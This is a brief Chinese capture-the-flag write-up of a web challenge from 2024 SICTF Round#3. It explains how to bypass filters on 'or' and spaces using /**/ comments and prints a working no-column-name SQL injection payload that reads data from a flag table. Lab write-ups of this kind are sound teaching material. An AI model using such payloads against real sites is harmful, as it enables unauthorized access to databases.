sql无列名注入 2024 SICTF Round#3 WEB

题目：hacker

这好像不是简单的sql注入
题目发现or用不了，空格也用不了但是可以使用/**/代替
查看源代码发现：所以目前我们只知道表名
可以使用sql无列名注入，只需知道表名不用知道字段名即可查询字段的数据，payload如下；

?username=0'union/**/select/**/c/**/from/**/(select/**/1,2/**/as/**/c/**/union/**/select/**/*/**/from/**/flag)/**/as/**/d%23

得到flag